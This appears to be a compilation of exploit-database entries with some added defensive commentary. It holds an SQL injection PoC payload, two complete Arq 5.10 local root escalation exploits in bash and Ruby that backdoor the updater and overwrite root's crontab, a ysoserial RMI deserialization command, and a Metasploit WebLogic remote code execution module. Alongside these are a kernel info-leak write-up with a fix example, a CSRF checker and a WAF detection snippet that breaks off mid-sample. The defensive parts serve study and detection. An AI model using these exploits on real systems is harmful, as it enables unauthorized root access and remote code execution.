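    if not token or not hmac.compare_digest(token, session_token):
        return (False, "missing or wrong CSRF token")
    return (True, "same-origin request with valid token")


# Constructed requests shaped like the two PoCs above plus two controls.
REQUESTS = {
    # JSON XHR with credentials, as in the Nexpose PoC, but sent from another site.
    "forged_json_xhr": {
        "method": "POST", "scheme": "https",
        "headers": {"Host": "nexpose-server.com", "Origin": "https://attacker.example",
                    "Content-Type": "application/json", "Cookie": "JSESSIONID=constructed"},
    },
    # Auto-submitted cross-site form, as in the Netis PoC.
    "forged_form_post": {
        "method": "POST", "scheme": "http",
        "headers": {"Host": "192.168.10.2", "Origin": "http://attacker.example",
                    "Content-Type": "application/x-www-form-urlencoded"},
        "form": {"mode_name": "netcore_set", "reserve_address_set": "1"},
    },
    # Same form with Origin and Referer stripped by a privacy proxy: still refused.
    "headerless_post": {
        "method": "POST", "scheme": "http",
        "headers": {"Host": "192.168.10.2"},
        "form": {"mode_name": "netcore_set", "reserve_address_set": "1"},
    },
    # Legitimate same-origin request carrying the session's token.
    "legit_post": {
        "method": "POST", "scheme": "https",
        "headers": {"Host": "nexpose-server.com", "Origin": "https://nexpose-server.com",
                    "X-CSRF-Token": SESSION_TOKEN, "Content-Type": "application/json"},
    },
}


def evaluate_all():
    """Run csrf_verdict over every constructed request; return {name: (allowed, reason)}."""
    return {name: csrf_verdict(req, SESSION_TOKEN) for name, req in REQUESTS.items()}


if __name__ == "__main__":
    for name, (allowed, reason) in evaluate_all().items():
        print("%-17s %-6s %s" % (name, "ALLOW" if allowed else "DENY", reason))
```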
# # # # #
# Exploit Title: Multilanguage Real Estate MLM Script <= 3.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
# Version: <= 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/product-list.php?srch=[SQL]
#
# %73%66%64%27%29%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%28%31%29%2c%28%32%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%29%2d%2d%20%2d
#
# # # # #
#!/bin/bash
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
#################################################################
app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"
vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`
if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi
if [ "$1" != "-f" ] ; then
latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
status_line="`egrep -i 'backup session.*?(ended|started)' \
\"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"
if [ "$status_line" != "" ] ; then
echo -n "WARNING: backup in progress, the user will very "
echo "likely notice if we exploit now!"
echo "use -f to override."
exit 1
fi
fi
owd="`pwd`"
if [ -e ~/.arq_510_privesc_exp ] ; then
rm -rf ~/.arq_510_privesc_exp
fi
mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp
echo "copying application..."
cp -R /Applications/Arq.app .
echo "compiling payloads..."
cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
|cut -d ' ' -f2\`
if [ "\$pid" != "" ] ; then
kill -9 \$pid
open $app/Contents/Library/LoginItems/Arq\ Agent.app
exit 0
fi
done
EOF
chmod 755 payload.sh
au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`
cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
if (ac > 1 && strcmp(av[1], "boom") == 0) {
setuid(0);
setgid(0);
execl(
"/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
"estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
"load.sh;/bin/bash", NULL
);
}
return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c
payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`
echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/
echo "executing upgrade..."
"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
1>/dev/null 2>/dev/null
echo "waiting..."
while :
do
ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`
if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
cd "$owd"
$res/standardrestorer boom
exit 0
fi
sleep 0.2
done
#!/usr/bin/env ruby
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
#################################################################
###### ######
###### Usage: ######
###### ######
###### ./arq_5.10.rb # stage 1 ######
###### ######
###### (wait for next Arq backup run) ######
###### ######
###### ./arq_5.10.rb # stage 2 ######
###### ######
###### if you know the HMAC from a previous run: ######
###### ######
###### ./arq_5.10.rb stage2 <hmac> ######
###### ######
#################################################################
###### USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT ######
###### USER'S CRONTAB! ######
#################################################################
$binary_target = "/tmp/arq_510_exp"
class Arq510PrivEsc
def initialize(args)
@payload_file = ".arq_510_exp_payload"
@hmac_file = ENV["HOME"] + "/.arq_510_exp_hmac"
@backup_file = ENV["HOME"] + "/" + @payload_file
@target = shell("ls -1t ~/Library/Arq/Cache.noindex/ |head -n1")
@bucket_uuid = shell("grep 'writing head blob key' " +
"~/Library/Logs/arqcommitter/* |tail -n1 |sed 's/^.*key //' |cut -d " +
"' ' -f4")
@computer_uuid = shell("cat ~/Library/Arq/config/app_config.plist |grep " +
"-A1 #{@target} |tail -n1 |xargs |cut -d '>' -f2 |cut -d '<' -f1")
@backup_endpoint = shell("cat ~/Library/Arq/config/targets/#{@target}.target " +
"|grep -A1 '>endpointDescription<' |tail -n1 |xargs |cut -d '>' -f2 " +
"| cut -d '<' -f1")
@latest_backup_set = latest_backup_set
puts " target: #{@target}"
puts " bucket uuid: #{@bucket_uuid}"
puts " computer uuid: #{@computer_uuid}"
puts "backup endpoint: #{@backup_endpoint}"
puts " latest backup: #{@latest_backup_set}\n\n"
if args.length >0
method = args.shift
if respond_to? method
send method, *args
end
else
if File.exist? @hmac_file
method = :stage2
else
method = :stage1
end
send method
end
end
def shell(command)
`#{command}`.chomp
end
def latest_backup_set
shell("grep 'writing head blob' ~/Library/Logs/arqcommitter/* |tail -n1 " +
"|sed 's/.*key //' |cut -d ' ' -f1")
end
def scan_hmac_list
packsets_path = shell("find ~/Library/Arq/ -type d -name packsets")
hmac = {}
shell("strings #{packsets_path}/*-trees.db").split("\n").each do |line|
if (m = line.match(/[0-9a-fA-F]+/)) and m[0].length == 40
if !hmac.include? m[0]
hmac[m[0]] = 1
end
end
end
hmac
end
def stage1
print "building HMAC cache... "
hmac = scan_hmac_list
File.open(@hmac_file, "w") do |f|
f.write(@latest_backup_set + "\n" + hmac.keys.join("\n"))
end
puts "done - stored at #{@hmac_file}"
print "dropping backup file... "
File.open(@backup_file, "w") do |f|
f.write("* * * * * /usr/sbin/chown root:wheel #{$binary_target} &&" +
"/bin/chmod 4755 #{$binary_target}\n")
end
puts "done"
puts "wait for the next backup run to complete and then run again"
end
def stage2(target_hmac=nil)
if !target_hmac
if !File.exist? @hmac_file
raise "hmac list not found."
end
print "loading HMAC cache... "
      data = File.read(@hmac_file).split("\n")
      puts "done"
      initial_backup_set = data.shift
      if initial_backup_set == @latest_backup_set
        puts "no new backup created yet"
        exit 1
      end
      hmac = {}
      data.each do |h|
        hmac[h] = 1
      end
      hmac_targets = []
      print "scanning for HMAC targets... "
      scan_hmac_list.keys.each do |h|
        if !hmac[h]
          hmac_targets.push h
        end
      end
      puts "done"
      if hmac_targets.length == 0
        puts "no HMAC targets, unable to continue."
        exit 0
      end
      puts "found #{hmac_targets.length} HMAC targets"
      hmac_targets.each do |hmac|
        attempt_exploit(hmac)
      end
    else
      attempt_exploit(target_hmac)
    end
  end

  def build_payload(hmac)
    d = "\x01\x00\x00\x00\x00\x00\x00\x00"
    e = "\x00\x00\x00\x00\x03"
    @overwrite_path = '/var/at/tabs/root'
    # The plist body is part of the payload and its byte length is encoded
    # below, so its literal content is kept exactly as is.
    plist = "
<plist version=\"1.0\">
<dict>
<key>Endpoint</key>
<string>#{@backup_endpoint}</string>
<key>BucketUUID</key>
<string>#{@bucket_uuid}</string>
<key>BucketName</key>
<string>/</string>
<key>ComputerUUID</key>
<string>#{@computer_uuid}</string>
<key>LocalPath</key>
<string>/</string>
<key>LocalMountPoint</key>
<string>/</string>
<key>StorageType</key>
<integer>1</integer>
<key>SkipDuringBackup</key>
<false></false>
<key>ExcludeItemsWithTimeMachineExcludeMetadataFlag</key>
<false></false>
</dict>
</plist>"
    hex = plist.length.to_s(16).rjust(4,'0')
    plist_size = (hex[0,2].to_i(16).chr + hex[2,2].to_i(16).chr)
    pfl = @payload_file.length.chr
    opl = @overwrite_path.length.chr
    bel = @backup_endpoint.length.chr
    payload = sprintf(
      (
        "%s\$%s%s%s%s\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
        "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30" +
        "\x2e\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s" +
        "\x00\x00\x00%s%s%s\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00" +
        "\x00\x00%s\x00\x00\x00%s%s%s\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00" +
        "\x00\x00\x00\x00\x00\x14\x00%s%s%s\x00\x00\x00\x03%s\x0a"
      ).force_encoding('ASCII-8BIT'),
      d, @target,
      d, bel, @backup_endpoint,
      plist_size, plist,
      d, @latest_backup_set,
      d, d, pfl, @payload_file,
      d, hmac,
      d, d, pfl, @payload_file,
      d, opl, @overwrite_path,
      e * 10
    )
    return payload
  end

  def attempt_exploit(hmac)
    print "trying HMAC: #{hmac} ... "
    File.open("/tmp/.arq_exp_510_payload","w") do |f|
      f.write(build_payload(hmac))
    end
    output = shell("cat /tmp/.arq_exp_510_payload | " +
                   "/Applications/Arq.app/Contents/Resources/standardrestorer 2>/dev/null")
    File.delete("/tmp/.arq_exp_510_payload")
    if output.include?("Creating directory structure") and !output.include?("failed")
      puts "SUCCESS"
      print "compiling shell invoker... "
      shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);" +
                  "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{$binary_target};rm -f " +
                  "/var/at/tabs/root;/bin/bash\","+ "NULL);return 0; }"
      IO.popen("gcc -xc -o #{$binary_target} -", "r+") do |io|
        io.write(shellcode)
        io.close
      end
      puts "done"
      print "waiting for root+s... "
      timeout = 61
      i = 0
      stop = false
      while i < timeout
        s = File.stat($binary_target)
        if s.mode == 0104755 and s.uid == 0
          puts "\n"
          exec($binary_target)
        end
        sleep 1
        i += 1
        if !stop
          left = 60 - Time.now.strftime("%S").to_i
          left == 1 && stop = true
          print "#{left} "
        end
      end
      puts "exploit failed"
      exit 0
    else
      puts "FAIL"
    end
  end
end

Arq510PrivEsc.new(ARGV)
# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
# Date: 01-28-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.3 (E0504) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5792
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/
# note that this PoC will launch calc.exe
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe
/*
The sysctls vfs.generic.conf.* are handled by sysctl_vfs_generic_conf(), which is implemented as follows:

static int
sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS
{
	int *name, namelen;
	struct vfstable *vfsp;
	struct vfsconf vfsc;

	(void)oidp;
	name = arg1;
	namelen = arg2;
	[check for namelen==1]
	mount_list_lock();
	for (vfsp = vfsconf; vfsp; vfsp = vfsp->vfc_next)
		if (vfsp->vfc_typenum == name[0])
			break;
	if (vfsp == NULL) {
		mount_list_unlock();
		return (ENOTSUP);
	}

	vfsc.vfc_reserved1 = 0;
	bcopy(vfsp->vfc_name, vfsc.vfc_name, sizeof(vfsc.vfc_name));
	vfsc.vfc_typenum = vfsp->vfc_typenum;
	vfsc.vfc_refcount = vfsp->vfc_refcount;
	vfsc.vfc_flags = vfsp->vfc_flags;
	vfsc.vfc_reserved2 = 0;
	vfsc.vfc_reserved3 = 0;

	mount_list_unlock();
	return (SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf)));
}

`struct vfsconf` is defined as follows (the closing comment markers are left out here so that this
write-up can sit inside a single C comment block):

struct vfsconf {
	uint32_t vfc_reserved1;		/* opaque
	char	 vfc_name[MFSNAMELEN];	/* filesystem type name
	int	 vfc_typenum;		/* historic filesystem type number
	int	 vfc_refcount;		/* number mounted of this type
	int	 vfc_flags;		/* permanent flags
	uint32_t vfc_reserved2;		/* opaque
	uint32_t vfc_reserved3;		/* opaque
};

`MFSNAMELEN` is defined as follows:

#define MFSNAMELEN	15	/* length of fs type name, not inc. null
#define MFSTYPENAMELEN	16	/* length of fs type name including null

This means that one byte of uninitialized padding exists between `vfc_name` and `vfc_typenum`.

This issue was discovered using an AFL-based fuzzer, loosely based on TriforceAFL. This is the diff of two runs over the fuzzer queue with different stack poison values (0xcc and 0xdd):

--- traces_cc_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:41.486752415 +0100
+++ traces_dd_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:56.583413293 +0100
@@ -1,19 +1,19 @@
loaded 72 bytes fuzzdata
USER READ: addr 0xffffffffffffffff, size 8, value 0x00000600020000ca
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000003
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000004
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000060000
USER READ: addr 0xffffffffffffffff, size 8, value 0x00ea800500000010
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000010003
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000000
syscall(rax=0x600020000ca, args=[0x3, 0x4, 0x60000, 0xea800500000010, 0x10003, 0x0]); rsp=0x7ffee418eda8
USER READ: addr 0x3, size 8, value 0x0000000000000003
USER READ: addr 0xb, size 8, value 0x0000001700000002
USER WRITE: addr 0x60000, size 8, value 0x0073666800000000
USER WRITE: addr 0x60008, size 8, value 0x0000000000000000
-USER WRITE: addr 0x60010, size 8, value 0x00000017cc000000
+USER WRITE: addr 0x60010, size 8, value 0x00000017dd000000
USER WRITE: addr 0x60018, size 8, value 0x0000100000000001
USER WRITE: addr 0x60020, size 8, value 0x0000000000000000
sysret
OUT OF FUZZER INPUT DATA - REWINDING
REWIND! (trigger_exception=0x10006; cycles=7)
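Review bot: the single differing line in this hunk (the USER WRITE at addr 0x60010) carries the whole finding but is left for the reader to decode; suggest one sentence under the diff mapping it onto the struct. Little-endian 0x00000017cc000000 versus 0x00000017dd000000 places the poison byte at 0x60013, byte 19 of the copied-out struct vfsconf, between vfc_name[15] (bytes 4 to 18) and vfc_typenum (bytes 20 to 23, here 0x17 = 23), which is exactly the padding byte named above; the writes at 0x60000 and 0x60008 ("hfs" plus zero bytes) and at 0x60018 (refcount 1, flags 0x1000) are identical in both runs.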
Verified on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:

$ cat sysctl_conf_test.c
*/
#include <stdlib.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/mount.h>

/* Same layout as struct vfsconf, with the padding byte made explicit. */
struct vfsconf_withpad {
  int reserved1;
  char name[15];
  unsigned char pad1;
  int typenum;
  int refcount;
  int flags;
  int reserved2;
  int reserved3;
};

int main(void) {
  int name[] = { CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 };
  /* static, hence zero-filled: any non-zero pad1 came from the kernel */
  static struct vfsconf_withpad conf;
  size_t outlen = sizeof(conf);
  if (sysctl(name, sizeof(name)/sizeof(name[0]), &conf, &outlen, NULL, 0))
    err(1, "sysctl");
  if (outlen != sizeof(conf))
    errx(1, "outlen != sizeof(conf)");
  printf("name=%.15s pad1=0x%02hhx typenum=%d refcount=%d flags=%d\n",
         conf.name, conf.pad1, conf.typenum, conf.refcount, conf.flags);
}
/*
$ gcc -o sysctl_conf_test sysctl_conf_test.c -Wall
$ ./sysctl_conf_test
name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
*/
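The write-up above pins the leak on one padding byte. The following is an added example of mine, not part of the original report or its sysctl_conf_test.c: it reproduces the mechanism in plain user-space C and shows the fix. `struct vfsconf_local` copies the quoted `struct vfsconf` layout; the 0xcc poison, the `hfs` sample entry and all function names are constructed for this example.

```c
/* Added example: why a memberwise fill of a padded struct leaks old memory,
 * and the defensive pattern (clear the whole object first) that closes it.
 * struct vfsconf_local mirrors the struct vfsconf quoted in the write-up;
 * the 0xcc poison stands in for the stale stack bytes the fuzzer observed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MFSNAMELEN_LOCAL 15

struct vfsconf_local {
    uint32_t vfc_reserved1;                 /* bytes 0..3   */
    char     vfc_name[MFSNAMELEN_LOCAL];    /* bytes 4..18  */
    /* one byte of compiler padding lives here: byte 19 */
    int      vfc_typenum;                   /* bytes 20..23 */
    int      vfc_refcount;
    int      vfc_flags;
    uint32_t vfc_reserved2;
    uint32_t vfc_reserved3;
};

/* Offset of the padding byte: the first byte after vfc_name. */
#define PAD_OFFSET (offsetof(struct vfsconf_local, vfc_name) + MFSNAMELEN_LOCAL)

/* Source record, standing in for the kernel's struct vfstable entry. */
struct fs_entry {
    char name[MFSNAMELEN_LOCAL];
    int  typenum, refcount, flags;
};

static const struct fs_entry HFS_ENTRY = { "hfs", 23, 2, 4096 };

/* Memory the struct is built in, pre-filled with a poison byte so the leak
 * is visible deterministically (in the kernel this is whatever the stack
 * slot held before). The union lets us read the raw bytes back legally. */
union conf_mem {
    unsigned char raw[sizeof(struct vfsconf_local)];
    struct vfsconf_local c;
};

/* Vulnerable pattern, as in sysctl_vfs_generic_conf(): every named member is
 * assigned, but member stores never touch padding, so byte 19 keeps its old
 * value and would be copied out to user space by SYSCTL_OUT(). */
static void fill_memberwise(struct vfsconf_local *c, const struct fs_entry *e)
{
    c->vfc_reserved1 = 0;
    memcpy(c->vfc_name, e->name, sizeof(c->vfc_name));
    c->vfc_typenum   = e->typenum;
    c->vfc_refcount  = e->refcount;
    c->vfc_flags     = e->flags;
    c->vfc_reserved2 = 0;
    c->vfc_reserved3 = 0;
}

/* Hardened pattern: clear the entire object representation, padding
 * included, before filling members (memset/bzero before copyout). */
static void fill_zeroed(struct vfsconf_local *c, const struct fs_entry *e)
{
    memset(c, 0, sizeof(*c));
    fill_memberwise(c, e);
}

/* The padding byte each variant would hand to user space. */
unsigned char padding_byte_memberwise(void)
{
    union conf_mem m;
    memset(m.raw, 0xcc, sizeof(m.raw));   /* poison, like the fuzzer's 0xcc run */
    fill_memberwise(&m.c, &HFS_ENTRY);
    return m.raw[PAD_OFFSET];             /* 0xcc: the stale byte leaks */
}

unsigned char padding_byte_zeroed(void)
{
    union conf_mem m;
    memset(m.raw, 0xcc, sizeof(m.raw));
    fill_zeroed(&m.c, &HFS_ENTRY);
    return m.raw[PAD_OFFSET];             /* 0x00: padding was cleared */
}

size_t padding_offset(void) { return PAD_OFFSET; }
```

When reviewing similar sysctl or ioctl handlers, the thing to look for is a `memset`/`bzero` of the whole output struct (or a `= {0}` initialiser followed by a copy-out of that same object) rather than a list of member assignments; the latter is correct for every named field and still wrong for the bytes in between.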
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
        'Description' => %q(
          The Oracle WebLogic WLS WSAT Component is vulnerable to an XML Deserialization
          remote code execution vulnerability. Supported versions that are affected are
          10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
          of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
          HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
          and will not be used when executing the exploit itself.
        ),
        'License' => MSF_LICENSE,
        'Author' => [
          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
          'Luffin', # Proof of Concept
          'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
        ],
        'References' =>
          [
            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
            ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
            ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
            ['CVE', '2017-10271'],
            ['EDB', '43458']
          ],
        'Platform' => %w{ win unix },
        'Arch' => [ ARCH_CMD ],
        'Targets' =>
          [
            [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
          ],
        'DisclosureDate' => "Oct 19 2017",
        # Note that this is by index, rather than name. It's generally easiest
        # just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
      # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
    ])
  end

  def cmd_base
    if target['Platform'] == 'win'
      return 'cmd'
    else
      return '/bin/sh'
    end
  end

  def cmd_opt
    if target['Platform'] == 'win'
      return '/c'
    else
      return '-c'
    end
  end

  #
  # This generates an XML payload that will execute the desired payload on the RHOST
  #
  def exploit_process_builder_payload
    # Generate a payload which will execute on a *nix machine using /bin/sh
    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3" >
            <void index="0">
              <string>#{cmd_base}</string>
            </void>
            <void index="1">
              <string>#{cmd_opt}</string>
            </void>
            <void index="2">
              <string>#{payload.encoded.encode(xml: :text)}</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>}
  end

  #
  # This builds an XML payload that will generate an HTTP GET request to our SRVHOST
  # from the target machine.
  #
  def check_process_builder_payload
    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <void id="url" class="java.net.URL">
          <string>#{get_uri.encode(xml: :text)}</string>
        </void>
        <void idref="url">
          <void id="stream" method = "openStream" />
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>}
  end

  #
  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
  # the logs too much with a no response error or similar.
  #
  def on_request_uri(cli, request)
    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
    send_response(cli, random_content)
    @received_request = true
  end

  #
  # The check method connects to the remote service and sends a randomly generated string
  # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
  # the response from. This is based off of the exploit technique from
  # exploits/windows/novell/netiq_pum_eval.rb
  #
  # This doesn't work as is because MSF cannot mix HttpServer and HttpClient
  # at the time of authoring this
  #
  # def check
  #   start_service
  #
  #   print_status('Sending the check payload...')
  #   res = send_request_cgi({
  #     'method' => 'POST',
  #     'uri' => normalize_uri(target_uri.path),
  #     'data' => check_process_builder_payload,
  #     'ctype' => 'text/xml;charset=UTF-8'
  #   }, datastore['TIMEOUT'])
  #
  #   print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
  #
  #   waited = 0
  #   until @received_request
  #     sleep 1
  #     waited += 1
  #     if waited > datastore['HTTP_DELAY']
  #       stop_service
  #       return Exploit::CheckCode::Safe
  #     end
  #   end
  #
  #   stop_service
  #   return Exploit::CheckCode::Vulnerable
  # end

  #
  # The exploit method connects to the remote service and sends the specified payload
  # encapsulated within a SOAP XML body.
  #
  def exploit
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'data' => exploit_process_builder_payload,
      'ctype' => 'text/xml;charset=UTF-8'
    }, datastore['TIMEOUT'])
  end
end
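What the module's SOAP envelope looks like on the wire is the detection opportunity. The following added C example (mine, not from the Metasploit module or the referenced PoC) is a request-body check of the kind a WAF rule or an access-log review script would apply to POSTs on the wls-wsat path: it isolates the WorkContext SOAP header and flags the `<java>` XMLDecoder element and the class names that both the exploit payload and the commented-out check payload depend on. The three sample bodies are constructed for this example, with a harmless `echo` standing in for a command.

```c
/* Added example: flag XMLDecoder-style content inside the WS-AT WorkContext
 * header. Sample request bodies below are constructed, not captured. */
#include <stdio.h>
#include <string.h>

enum {
    WSAT_JAVA_IN_WORKCONTEXT = 1,  /* a <java ...> element inside WorkContext */
    WSAT_PROCESSBUILDER      = 2,  /* java.lang.ProcessBuilder referenced    */
    WSAT_XMLDECODER          = 4,  /* java.beans.XMLDecoder referenced       */
    WSAT_URL_FETCH           = 8   /* java.net.URL (callback-style check)    */
};

/* Exact substring search limited to [start, end). Returns pointer or NULL. */
static const char *find_in(const char *start, const char *end, const char *needle)
{
    size_t n = strlen(needle);
    for (const char *p = start; p + n <= end; p++)
        if (memcmp(p, needle, n) == 0)
            return p;
    return NULL;
}

/* Returns a bitmask of the indicators found; 0 means nothing suspicious.
 * Only the WorkContext header is inspected, so a legitimate body that
 * merely mentions these class names elsewhere does not trip the check. */
int wsat_body_indicators(const char *body)
{
    const char *end = body + strlen(body);
    /* The element may carry any namespace prefix, so match the local name. */
    const char *wc = find_in(body, end, ":WorkContext");
    if (!wc)
        wc = find_in(body, end, "<WorkContext");
    if (!wc)
        return 0;
    const char *open_end = memchr(wc, '>', (size_t)(end - wc));
    if (!open_end)
        return 0;                              /* malformed, nothing to scan */
    const char *wc_end = find_in(open_end, end, "WorkContext>");
    if (!wc_end)
        wc_end = end;                          /* truncated: scan to the end */

    int flags = 0;
    if (find_in(wc, wc_end, "<java"))
        flags |= WSAT_JAVA_IN_WORKCONTEXT;
    if (find_in(wc, wc_end, "java.lang.ProcessBuilder"))
        flags |= WSAT_PROCESSBUILDER;
    if (find_in(wc, wc_end, "java.beans.XMLDecoder"))
        flags |= WSAT_XMLDECODER;
    if (find_in(wc, wc_end, "java.net.URL"))
        flags |= WSAT_URL_FETCH;
    return flags;
}

/* Constructed samples. */
static const char BENIGN_BODY[] =
    "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
    "<soapenv:Header/>"
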